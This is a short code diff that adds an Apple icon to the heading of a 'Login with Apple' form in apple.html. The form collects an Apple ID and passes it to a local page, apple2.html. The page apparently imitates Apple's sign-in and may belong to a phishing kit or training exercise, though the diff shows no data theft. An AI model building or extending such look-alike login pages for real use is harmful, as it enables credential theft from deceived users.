--- a/apple.html
+++ b/apple.html
@@ -17,7 +17,7 @@
         <div class="shape"></div>
     </div>
     <form action="./apple2.html" method="get" name="form">
-        <h3>Login with Apple</h3>
+        <h3>Login with Apple <i class="fab fa-apple"></i></h3>
 
         <label for="username">Apple Id</label>
         <input type="text" placeholder="Apple Id" name="username" id="username" class="login" required>
